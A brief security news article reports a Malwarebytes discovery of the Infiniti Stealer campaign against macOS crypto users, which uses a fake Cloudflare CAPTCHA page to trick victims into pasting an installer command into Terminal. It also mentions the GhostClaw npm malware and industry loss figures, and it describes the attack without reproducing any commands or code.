The Infiniti Stealer malware spreads through a fake Cloudflare CAPTCHA page, targeting cryptocurrency wallets and sensitive data on macOS, amid industry-wide losses projected to reach $3.4 billion in 2025.
Security researchers from Malwarebytes have just discovered a new attack campaign targeting users of crypto assets on macOS, using a fake CAPTCHA page mimicking Cloudflare's verification interface to distribute data -stealing software called Infiniti Stealer.
The worrying aspect of this campaign lies in its infection mechanism: instead of exploiting system vulnerabilities, attackers trick users into executing malicious commands themselves, a technique known as ClickFix, which is common on Windows but is being adapted to attack the Apple ecosystem.
macOS is no longer a safe zone against malware that steals cryptographic assets.
The attack process was sophisticatedly designed to bypass traditional defenses. Users accessed a website with a domain impersonating an update checking service, displaying a CAPTCHA interface identical to Cloudflare's. After clicking confirm, the page requested opening the Terminal and pasting a command presented as a standard verification step.
This command is essentially a hidden installation Script that connects to a remote control server to download and deploy Infiniti Stealer without displaying any warnings. The malware is compiled into the native macOS binary instead of easily readable Script , making analysis and detection significantly more difficult.
After a successful intrusion, Infiniti Stealer extracts cryptocurrency wallet data, browser login credentials, macOS Keychain data, developer text files, and screenshots taken during execution. The malware also incorporates a mechanism to detect the analysis environment to avoid detection, sends notifications via Telegram upon completion of extraction, and adds the collected login credentials to the server-side password cracking queue.
This is not an isolated threat. Last March, the GhostClaw malware was distributed via npm, a popular JavaScript package manager, under the guise of a legitimate tool called OpenClaw, deploying a multi-stage attack to steal private keys and wallet access before being removed after 178 developers had downloaded it.
The broader picture reveals the severity of this trend: according to Chainalysis, the proportion of personal wallet breaches in total stolen value increased from 7.3% in 2022 to 44% in 2024, while total industry losses in 2025 reached $3.4 billion.
For macOS users, the simplest recommended practice is to absolutely never paste commands into Terminal from any unverified source.
